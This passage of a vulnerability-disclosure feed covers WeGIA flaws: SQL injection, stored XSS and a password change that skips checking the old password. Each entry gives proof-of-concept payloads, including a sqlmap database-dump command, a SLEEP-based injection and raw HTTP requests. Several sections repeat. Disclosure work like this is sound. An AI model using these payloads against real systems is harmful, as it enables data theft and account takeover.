customer data or business information can significantly harm the organization's image.</li> <li>Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h2mg-4c7q-w69v" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h2mg-4c7q-w69v</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 20 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23220/ https://www.cvehunters.com/p/cve-2025-23220/ <h2 id="cve-2025-23220-sql-injection-endpoint-adicionar_racaphp-parameter-raca">CVE-2025-23220: SQL Injection endpoint <code>adicionar_raca.php</code> parameter <code>raca</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23220" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23220</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>adicionar_raca.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_raca.php</code></p><h2 id="cve-2025-23220-sql-injection-endpoint-adicionar_racaphp-parameter-raca">CVE-2025-23220: SQL Injection endpoint <code>adicionar_raca.php</code> parameter <code>raca</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23220" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23220</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the WeGIA application, specifically in the <code>adicionar_raca.php</code> endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application's database, highlighting the severity of the flaw.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_raca.php</code></p> <p>Parameter: <code>raca</code></p> <p style="text-align: justify;">The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.</p> <h2 id="poc">POC </h2><h3 id="payload-sqlmap">Payload (sqlmap): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -u "http://localhost/dao/pet/adicionar_raca.php" --data="raca=raca" --dbms=mysql --cookie="PHPSESSID=thaicee00su2lhvlceu9r9v66v" --dump </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23220/403879198-d621a4fb-e0ce-4b07-9262-754eb83033d0.png" width="1341" height="188" srcset="/p/cve-2025-23220/403879198-d621a4fb-e0ce-4b07-9262-754eb83033d0_hu_a20b829ddc5e955f.png 480w, /p/cve-2025-23220/403879198-d621a4fb-e0ce-4b07-9262-754eb83033d0_hu_f0fd8f9980cab109.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="713" data-flex-basis="1711px" /></p> <p style="text-align: justify;">It was possible to identify the database <code>wegia</code>.</p> <p><img src="/p/cve-2025-23220/403879383-742204fd-b886-4242-aaa6-743af3706284.png" width="1345" height="180" srcset="/p/cve-2025-23220/403879383-742204fd-b886-4242-aaa6-743af3706284_hu_3eb2ecb5d27ad788.png 480w, /p/cve-2025-23220/403879383-742204fd-b886-4242-aaa6-743af3706284_hu_e95b08231d82e0ee.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="747" data-flex-basis="1793px" /></p> <p style="text-align: justify;">It was possible to fully dump the <code>pessoa</code> table.</p> <p><img src="/p/cve-2025-23220/403879461-c1de0984-c0a3-4a80-930f-dd686067be9b.png" width="1347" height="126" srcset="/p/cve-2025-23220/403879461-c1de0984-c0a3-4a80-930f-dd686067be9b_hu_44347e579bef36ca.png 480w, /p/cve-2025-23220/403879461-c1de0984-c0a3-4a80-930f-dd686067be9b_hu_6833eead79fc2641.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="1069" data-flex-basis="2565px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.</li> <li>Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.</li> <li>Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.</li> <li>Reputational damage: Exposing customer data or business information can significantly harm the organization's image.</li> <li>Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-425j-h4cf-g52j" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-425j-h4cf-g52j</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 20 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-57030/ https://www.cvehunters.com/p/cve-2024-57030/ <h2 id="cve-2024-57030-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-id">CVE-2024-57030: Cross-Site Scripting (XSS) Stored in <code>documentos_funcionario.php</code> parameter <code>id</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57030" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57030</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p><h2 id="cve-2024-57030-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-id">CVE-2024-57030: Cross-Site Scripting (XSS) Stored in <code>documentos_funcionario.php</code> parameter <code>id</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57030" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57030</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p> <h2 id="poc">POC </h2><p style="text-align: justify;">To reproduce the issue, insert the following payloads into the vulnerable field of the URL and save the changes:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS'</span><span class="p">);</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">After saving the input, the injected script will be stored on the server and automatically executed for any user accessing the <code>html/geral/documentos_funcionario.php</code>, confirming the stored XSS.</p> <p>File: <code>documentos_funcionario.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS'</span><span class="p">);</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p>Trigger in: <code>html/geral/documentos_funcionario.php</code></p> <p>Endpoint: <code>id</code></p> <p><img src="/p/cve-2024-57030/image.png" width="1258" height="705" srcset="/p/cve-2024-57030/image_hu_5cec27c52b3418d1.png 480w, /p/cve-2024-57030/image_hu_fb5108c189509bce.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="178" data-flex-basis="428px" /></p> <p><img src="/p/cve-2024-57030/image-1.png" width="1283" height="724" srcset="/p/cve-2024-57030/image-1_hu_9eea4f05d8b0505c.png 480w, /p/cve-2024-57030/image-1_hu_2c1659751a161b62.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="177" data-flex-basis="425px" /></p> <h2 id="references">References </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/issues/815" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/815</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/nilsonmori/WeGIA" target="_blank" rel="noopener" >https://github.com/nilsonmori/WeGIA</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-57031/ https://www.cvehunters.com/p/cve-2024-57031/ <h2 id="cve-2024-57031-sql-injection-blind-time-based-in-remuneracaophp-parameter-id_funcionario">CVE-2024-57031: SQL Injection (Blind Time-Based) in <code>remuneracao.php</code> parameter <code>id_funcionario</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57031" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57031</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the endpoint <code>/WeGIA/html/funcionario/remuneracao.php</code>, in the <code>id_funcionario</code> parameter. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.</p><h2 id="cve-2024-57031-sql-injection-blind-time-based-in-remuneracaophp-parameter-id_funcionario">CVE-2024-57031: SQL Injection (Blind Time-Based) in <code>remuneracao.php</code> parameter <code>id_funcionario</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57031" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57031</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the endpoint <code>/WeGIA/html/funcionario/remuneracao.php</code>, in the <code>id_funcionario</code> parameter. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.</p> <h2 id="poc">POC </h2><h3 id="request">Request: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">POST /WeGIA/html/funcionario/remuneracao.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: comfirewall.wegia.org:8000 </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS1.1.1733313703.4.1.1733316730.35.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=702lhluk293h4ap0mv5l51u1g4 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded; charset=UTF-8 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Content-Length: 30 </span></span><span class="line"><span class="cl">Origin: https://comfirewall.wegia.org:8000 </span></span><span class="line"><span class="cl">Referer: https://comfirewall.wegia.org:8000/WeGIA/html/funcionario/profile_funcionario.php?id_funcionario=1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Te: trailers </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">action=listar<span class="err">&</span>id_funcionario=1 </span></span></code></pre></td></tr></table> </div> </div><p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-sql" data-lang="sql"><span class="line"><span class="cl"><span class="k">AND</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">7525</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="n">SLEEP</span><span class="p">(</span><span class="mi">20</span><span class="p">)))</span><span class="n">PXhT</span><span class="p">)</span><span class="o">`</span><span class="w"> </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="normal-request">Normal Request: </h3><p><img src="/p/cve-2024-57031/image.png" width="1267" height="602" srcset="/p/cve-2024-57031/image_hu_3383898eabf250db.png 480w, /p/cve-2024-57031/image_hu_d81bfee1bac7a32a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="210" data-flex-basis="505px" /></p> <h3 id="sql-injection-request">SQL Injection Request: </h3><p><img src="/p/cve-2024-57031/image-1.png" width="1266" height="601" srcset="/p/cve-2024-57031/image-1_hu_3e3114a7d1330222.png 480w, /p/cve-2024-57031/image-1_hu_65837b4b2b15e1bf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="210" data-flex-basis="505px" /></p> <h2 id="references">References </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/issues/822" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/822</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/nilsonmori/WeGIA" target="_blank" rel="noopener" >https://github.com/nilsonmori/WeGIA</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-57032/ https://www.cvehunters.com/p/cve-2024-57032/ <h2 id="cve-2024-57032-broken-authentication---old-password">CVE-2024-57032: Broken Authentication - Old Password </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57032" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57032</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A security vulnerability was identified in the web application WeGIA, where it is possible to change a user's password without verifying the old password. This issue exists in the <code>control.php</code> endpoint and allows unauthorized attackers to bypass authentication and authorization mechanisms to reset the password of any user, including admin accounts.</p><h2 id="cve-2024-57032-broken-authentication---old-password">CVE-2024-57032: Broken Authentication - Old Password </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57032" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57032</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A security vulnerability was identified in the web application WeGIA, where it is possible to change a user's password without verifying the old password. This issue exists in the <code>control.php</code> endpoint and allows unauthorized attackers to bypass authentication and authorization mechanisms to reset the password of any user, including admin accounts.</p> <h2 id="poc">POC </h2><p>Vulnerable Endpoint: <code>POST /WeGIA/controle/control.php</code></p> <p>HTTP Request Example:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">POST /WeGIA/controle/control.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: comfirewall.wegia.org:8000 </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 149 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">senha_antiga=A<span class="err">&</span>nova_senha=wegia<span class="err">&</span>confirmar_senha=wegia<span class="err">&</span>nomeClasse=FuncionarioControle<span class="err">&</span>metodo=alterarSenha<span class="err">&</span>redir=logout.php<span class="err">&</span>id_pessoa=1<span class="err">&</span>alterar=Alterar </span></span></code></pre></td></tr></table> </div> </div><h3 id="observations">Observations: </h3><p style="text-align: justify;">Missing Password Validation: The <code>senha_antiga</code> parameter is not validated, allowing the password to be reset without verifying the user's existing password.</p> <p style="text-align: justify;">Change the default password wegiafrom admin user and use a random value in the field <code>senha_antiga</code>:</p> <p><img src="/p/cve-2024-57032/image.png" width="993" height="530" srcset="/p/cve-2024-57032/image_hu_c70c86a5189d6022.png 480w, /p/cve-2024-57032/image_hu_4e86cb192fce30bd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p>Login with the new password:</p> <p><img src="/p/cve-2024-57032/image-1.png" width="993" height="528" srcset="/p/cve-2024-57032/image-1_hu_5bd7a6ceda7f220d.png 480w, /p/cve-2024-57032/image-1_hu_8f1a021e45882f76.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="188" data-flex-basis="451px" /></p> <h2 id="references">References </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/issues/814" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/814</a></p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 17 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-57033/ https://www.cvehunters.com/p/cve-2024-57033/ <h2 id="cve-2024-57033-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-dados_addinfo">CVE-2024-57033: Cross-Site Scripting (XSS) Stored in <code>documentos_funcionario.php</code> parameter <code>dados_addInfo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57033" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57033</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p><h2 id="cve-2024-57033-cross-site-scripting-xss-stored-in-documentos_funcionariophp-parameter-dados_addinfo">CVE-2024-57033: Cross-Site Scripting (XSS) Stored in <code>documentos_funcionario.php</code> parameter <code>dados_addInfo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-57033" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-57033</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p> <h2 id="poc">POC </h2><p style="text-align: justify;">To reproduce the issue, insert the following payloads into the vulnerable field of the URL and save the changes:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS2'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">After saving the input, the injected script will be stored on the server and automatically executed for any user accessing the <code>html/geral/documentos_funcionario.php</code>, confirming the stored XSS.</p> 